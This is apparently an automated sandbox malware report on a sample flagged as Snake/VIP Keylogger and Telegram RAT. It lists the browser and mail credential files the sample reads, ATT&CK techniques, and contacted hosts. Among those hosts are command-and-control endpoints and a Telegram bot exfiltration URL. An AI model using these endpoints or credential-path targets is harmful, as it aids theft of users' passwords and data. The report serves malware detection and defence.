Source: Yara match	File source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: savagenesses.exe	Binary or memory string: WIN_81
Source: savagenesses.exe	Binary or memory string: WIN_XP
Source: savagenesses.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: savagenesses.exe	Binary or memory string: WIN_XPe
Source: savagenesses.exe	Binary or memory string: WIN_VISTA
Source: savagenesses.exe	Binary or memory string: WIN_7
Source: savagenesses.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4522071961.000000000334C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.savagenesses.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.savagenesses.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00981204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00981204
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00981806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00981806
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FF1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_00FF1204
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FF1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00FF1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	331 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YJwE2gTm02.exe	44%	Virustotal		Browse
YJwE2gTm02.exe	74%	ReversingLabs	Win32.Exploit.VIPKeylogger
YJwE2gTm02.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\toggeries\savagenesses.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\toggeries\savagenesses.exe	74%	ReversingLabs	Win32.Exploit.VIPKeylogger
C:\Users\user\AppData\Local\toggeries\savagenesses.exe	44%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:019635%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20019635%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	RegSvcs.exe, 00000003.00000002.4522071961.0000000003434000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.000000000334C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003425000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	high
https://www.office.com/lB	RegSvcs.exe, 00000003.00000002.4522071961.000000000342F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000003.00000002.4522071961.0000000003403000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:019635%0D%0ADate%20a	RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000003.00000002.4522071961.00000000033FE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003300000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.4522071961.0000000003327000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003300000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003291000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000007.00000002.2558253285.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.4522071961.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000003.00000002.4524527218.0000000004261000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	savagenesses.exe, 00000002.00000002.2103334932.0000000000990000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.0000000003291000.00000004.00000800.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000002.2244066491.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587875
Start date and time:	2025-01-10 18:54:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YJwE2gTm02.exe renamed because original name is a hash value
Original Sample Name:	2e6f9a5fcfce60e9a28545dd9171993ed51d5e6ddb90643b9d3ea16f64c8a076.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@11/10@3/3
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 99% Number of executed functions: 52 Number of non-executed functions: 298
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.109.210.53, 13.107.246.45, 40.126.32.74
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 5000 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 5552 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:55:18	API Interceptor	11158121x Sleep call for process: RegSvcs.exe modified
12:55:52	API Interceptor	1x Sleep call for process: WerFault.exe modified
18:55:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
104.21.112.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
193.122.6.168	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ln5S7fIBkY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
reallyfreegeoip.org	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
api.telegram.org	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
